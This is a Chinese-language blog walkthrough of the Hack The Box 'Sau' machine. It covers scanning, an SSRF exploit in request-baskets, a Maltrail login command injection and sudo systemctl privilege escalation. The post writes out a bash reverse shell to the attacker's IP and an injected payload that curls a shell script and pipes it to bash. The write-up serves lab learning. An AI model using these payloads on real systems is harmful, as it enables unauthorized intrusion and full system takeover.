hack the box --sau

本文描述了在信息技术背景下,通过目录扫描、漏洞利用(包括SSRF漏洞)、反弹shell技术和提权过程,详细展示了如何在特定环境中进行安全评估和渗透测试。作者演示了如何利用GitHub上的工具和资源来找到并利用漏洞,以及如何构造payload和数据包进行攻击和提权。
摘要由CSDN通过智能技术生成

一 信息搜集

1.目录扫描

sudo nmap -sS -sV -A  10.10.11.224

二.漏洞利用

扫描出来的端口就只有5555可以访问,看到request baskets 这个信息,在GitHub上搜索一下有什么漏洞(hackthebox上的机器就是这这样搜索信息,然后去找web漏洞),直接在GitHub上下载exp,然后拿过来运行

jGitHub - entr0pie/CVE-2023-27163: Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1)h

 在这里 原本80端口是不可以访问的,这里使用exp,这可以在原本80端口的页面转发到10.10.11.224:55555/vukobn这里,访问即可

./CVE-2023-27163.sh http://10.10.11.224:55555/ http://10.10.14.128:80/

有许多点击处,但是点击不了,手动输入login试试

三 反弹shell

出现界面,这里看到右下角关键信息,又给了一个版本信息,直接github接着搜就行

找到漏洞链接,另起终端监听,下载好poc直接运行试试 ,这里攻击的就是那个login界面,只要确保后面那个链接是login的就行,以你们自己的为主。但是这里一直反弹不了,看看poc怎么写的。看到是" `paylaod` "。这里的反引号就是Linux中一个规则,在反引号中的字符都会当成bash命令去执行例如"ifconfig",双引号那就解释成一个单词,字符串 。`ifocnfig`就会执行这个命令。既然直接反弹不了,那么就远程下载一个bash反弹再执行

https://github.com/spookier/Maltrail-v0.53-Exploit/blob/main/exploit.py

这里我再把80端口的界面显示再10.10.11.224 :55555vdywiu界面上 ,这一步可以不要其实

起一个小型服务器,将一个反弹shell写入shell.sh 文件

bash -i >& /dev/tcp/10.10.14.128/4444 0>&1

 

将那个login界面抓包然后构造如下数据包,POST提交,数据部分就是poc内容只是要进行url编码。在进行编码即可,注意这里还要加上Content-Type这个字段,

username=;`curl 10.10.14.128/shell.sh|bash`

四 提权

发送即可得到shell,拿到先进行 sudo -l 直接出货,看到这里有/url/bin/systemctl,这就是提权思路

systemctl | GTFOBins

在这上面看一个思路,sudo运行后直接!sh 就可以提权成功

但是这里有一个痛点,就是有时候是无法稳定交互的,那就运行python得到稳定的一个终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

最后得到root权限,拿到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值